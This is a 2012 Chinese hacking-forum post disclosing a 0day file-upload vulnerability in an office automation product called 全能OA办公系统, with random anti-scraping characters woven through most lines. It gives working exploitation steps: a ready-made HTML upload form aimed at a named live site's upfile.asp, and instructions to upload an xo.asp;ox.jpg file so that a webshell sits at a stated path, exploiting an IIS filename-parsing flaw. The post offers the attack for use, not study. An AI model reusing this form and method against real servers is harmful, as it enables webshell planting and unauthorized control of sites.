找回密码
 立即注册
查看: 2635|回复: 0
打印 上一主题 下一主题

全能OA办公系统0day OA办公系统漏洞 上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-21 13:45:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
全能OA办公系统 上传漏洞( P. k; z9 o5 L) a) k" |, |# w

8 h1 j  t/ B- v: S6 g) G4 \系统介绍:
% [2 Y- D, e1 T. _$ q' k* Q/ }% J. ]  o3 j+ x+ }) _
全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。
& n" j: K2 d6 ~" e& P) }% [$ N9 ^4 J! w0 I: Y0 s% x. Z, k
主要功能:
( U$ x$ _' w' h4 b5 x, j0 X公司通告 2 c9 F: o+ D8 I& ~4 ~
工作计划 0 H3 D8 T8 ^4 {! f" i/ c4 F* o% R
通讯助理
0 i! F' {- |7 a4 A' f客户资源
! ?5 V' S9 f4 n, `8 _" Q我的公文 % ~! I& q0 h4 N
公文传阅
6 u* S' C: X0 j! B) R0 j% \9 Q公共资源
/ ^) S2 P& E0 t* U: I: X1 D资源预约
7 `* e: R* e/ [6 I$ n今日考勤 # d. }) s1 Q0 R8 Y, h
个人计划 1 Q9 n/ `  J( a4 k  H
个人通讯录 5 Q3 ~+ b9 `6 _# ^
个人基本档案
# o+ }) @1 a2 f" h, D) m8 V! A+ T未读邮件
" W- b. z2 t$ X9 N, f发邮件
" A0 w: U( G3 a9 z, N/ s收件夹 8 y. J6 P. q, S
寄件夹 1 P2 a( i: P1 n# S% O5 S2 x4 K
网络硬盘
, }5 `8 N4 i1 @( o. b" ]网络会议
4 j8 P7 J( o& M/ P$ `/ [网络调查 - X0 n9 C4 p( A( d. i9 j& ~
交流论坛
9 D# ~+ l: u$ y0 f- u! v% J% u- u; y
有兴趣测试的朋友可以下源码看看
5 _8 R  Q  ^6 V) w
/ o! t4 v: P7 p  B/ N4 j源码下载:0 C; ?  C( E3 ?- u; j) T

' O# w* K& m: @% Q# Phttp://www.mycodes.net/30/4750.htm
, `$ `6 {6 F2 U4 M
% y) P. X3 \! V' s漏洞介绍:
- d3 H1 e, Z; F) r6 v2 Z8 e: X; O
  n% i% _9 I% Z- n) K% T由upfile.asp上传文件漏洞引起
; o* Q1 y9 ~# t5 G' O, Q
6 K* f# b# B! G) ?测试方法:) C, `7 }$ o- l4 n
- @+ X9 J) L# s9 a1 Y' h: S
使用名小子上传http://www.itlynn.com/upfile.asp即可
! Z( [9 r2 A% o2 y  v4 H* C
+ g: e& V4 a0 ^) k# Z" q如果upfile.asp文件被删除不存在。
& J# e' [+ Q7 Q$ X( O" \
  b/ J& ]9 a( m# g* B  那么可以试着访问http://www.itlynn.com/upfile/upfile.asp1 k4 ~8 u( X3 U

. F/ ~2 i( u( x如果存在那么将如下代码保存为upfile.html。! I* S+ w; K6 L9 P9 M
# \0 \& `0 h6 T, y' R
然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp& l, U$ ?; m/ r  a
; I: ~6 q; p: u  O

7 V  g' H# T) G3 U% L+ t$ Z' q' T
2 ]  S/ g7 U4 k& ]3 @5 L( z01 <table border='0' align="center" cellpadding="5"> ' |' W* Z( A6 |" y. V; P: c1 C
" S7 N& l8 G8 A/ A$ n9 W# x  g
02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
, s. v% R2 ^7 i3 P$ C- C. T- u
# `9 Q$ O9 C8 k" ~4 i4 b1 W2 E% I3 i03 <tr>
; ?1 Y9 X9 N& b' v
6 k  {8 p* w; e7 M  n5 U04             <td>报错:</td>
- m' v1 @0 K: I7 l2 {  L& V; z& n/ r
) L3 U# _( ]/ E- a! E+ M! }05             <td><input type='radio' name='errnumber' value='0'>
0 }! Y. |8 _& E7 _: [
6 F. g- X( x% T; D9 S06               自动更名
2 U$ @4 U2 B; S0 H6 a4 n, {. _  b$ J
  T; }4 l4 _4 R07               <input type='radio' name='errnumber' value='1' checked> * z6 U6 V3 m0 f% \3 ~5 p

; K# G' n$ q3 M8 w& U08               报错方式
4 k$ }% H# h3 U7 g. c  c2 M
, x& G, o: w& }0 z0 V. v. t09               <input type='radio' name='errnumber' value='2'>
( p0 q( P' K# u. n, Q" R) W: V3 C
: P  U$ n5 Y$ ^4 Q5 L6 U3 K) X10               直接覆盖</td>
- X5 O1 {6 T2 N' U: a6 f; F9 l. T0 y; }2 C! t
11           </tr>
* H+ v, r8 ~6 m- W2 r. h6 k4 E# `( T1 j. n* Q- O3 w
12           <tr>
4 I& {9 ]1 K  @# d) Y
( z* V) c( j6 f# Z* T13             <td>主题:</td>
1 r# n! s' a4 ~' b
8 ^  Q4 Y/ M; |' O% h2 A14             <td><input type='text' name='filename' size='30'></td> * E* u# V* ?5 x( |% {# d

. H) ]1 n0 s- J' @8 Z" X7 m15           </tr>
; Q) d- b) E2 _. A7 G! o' L8 `0 o: Z$ |6 C# p  ~7 x( c& ]" B
16           <tr>
8 `* _* O6 G& q- X) ]& _4 B+ t" S! k
17             <td>文件:</td>
8 B+ N1 B) @- G5 v; K% [' X) Z/ C- G, j! D! b" r
18             <td><input type="file"name="fruit"size="30"></td>
" |% R- D/ z. a/ G
2 o% A+ V) }( q7 K& {( s$ P- d0 q19           </tr> . q  U& V2 L* ?* N6 @$ `: V0 s

1 i4 \3 z1 p7 t1 e9 ~) X) z0 s; A20           <tr> 0 ^. x# ?: X3 S1 B1 V& @: J7 i4 y
* J3 \" u5 \$ x4 u
21             <td valign='top'>简介:</td>
. X. s, |( y2 a8 j. L8 v3 c" w$ \8 _* n+ ]
22             <td><textarea name='fileExt' cols='40' rows='5'></textarea></td> - _  R  C9 r3 I# z1 _

2 c$ t/ T: k8 |23           </tr>
* m4 h0 N7 e$ P0 X0 L; }
6 C* l8 ~: F$ u0 `24   , d# j8 i& ?  A3 q
; `3 n& a3 W/ C8 ~% E6 l9 |  M
25             <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td>
8 ^  }5 E! @) N
; \( S. i; J. F+ J% @26           </tr>
/ E# B3 ]  p. f7 T- }6 N6 y5 n! G/ j# T0 O' T: D+ L! e$ E7 ?
27         </form> $ C( J( a6 e5 n  }* S/ n* h; v
) M% w8 B" W  W! Z, F
然后打开上传一个文件名为xo.asp;ox.jpg的文件。
. D, G& N, V& n, {7 l# d
5 W1 L& k" W" e
. t/ h+ _6 m- [2 q/ g0 }! P2 f5 f; c* @* K
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg5 T5 k, [. m5 A1 d) @. F6 P6 y
* c' h6 w" d. s% z* k
此漏洞需要配合解析漏洞利用。! e& q* c/ Z) {5 B' F- L2 @: l

! q4 F8 I5 `' k: o+ l2 ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表